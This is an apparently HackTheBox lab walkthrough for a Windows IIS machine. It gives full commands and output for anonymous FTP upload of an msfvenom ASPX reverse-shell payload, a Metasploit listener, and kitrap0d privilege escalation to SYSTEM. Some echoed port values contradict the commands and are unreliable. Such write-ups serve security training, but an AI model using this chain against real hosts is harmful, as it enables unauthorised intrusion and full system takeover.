Let’s get started
As always hacking starts with NMAP scan.
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 11:42 CET
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
From the results of NMAP we can see that port 21 and 80 are open. The NMAP also says that it’s a ISS 7 server.
So here is the exploit plan, upload an .aspx through ftp, get the reverse shell and escalate the privilege.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:ech0): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM IR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
Trying to upload a file through FTP
ftp> put test.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
16 bytes sent in 0.000144 seconds (114 kbytes/s)
As we can see that FTP file trasfer is successful.
Generating Payload
I’m using msfvenom to generate the reverse shell payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5566 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2824 bytes
As the Payload has been successfully generated, It’s time to upload the file to the victim machine via FTP.
ftp> put shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2860 bytes sent in 0.000315 seconds (8.66 Mbytes/s)
Setting up the listner in msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.*.*
msf5 exploit(multi/handler) > set LPORT 5566
LPORT => 9001
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
Running the exploit command and opening the shell.aspx in the browser, gave me a meterpreter session
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.*.*:5566
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.*.*:5566 -> 10.10.10.5:49158)
meterpreter > getuid
Server username: IIS APPPOOL\Web
As seeing the UID, we need to escalate our privileges to gain NT/Authority.
Privilege Escalation
For this part we need a exploit suggester, so I went with a Exploit Suggester module use post/multi/recon/local_exploit_suggester from metasploit.
After the run of Exploit Suggester, I used exploit/windows/local/ms10_015_kitrap0d for PE.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost tun0
lhost => tun0
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 5577
lport => 557
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on tun0:5577
[*] Launching notepad to host the exploit...
[+] Process 3372 launched.
[*] Reflectively injecting the exploit DLL into 3372...
[*] Injecting exploit into 3372 ...
[*] Exploit injected. Injecting payload into 3372...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.*.*:5577 -> 10.10.10.5:49159)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Getting User.txt
c:\Users\babis\Desktop> type user.txt
**********
Getting Root.txt
c:\Users\Administrator\Desktop> type root.txt
**********
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968
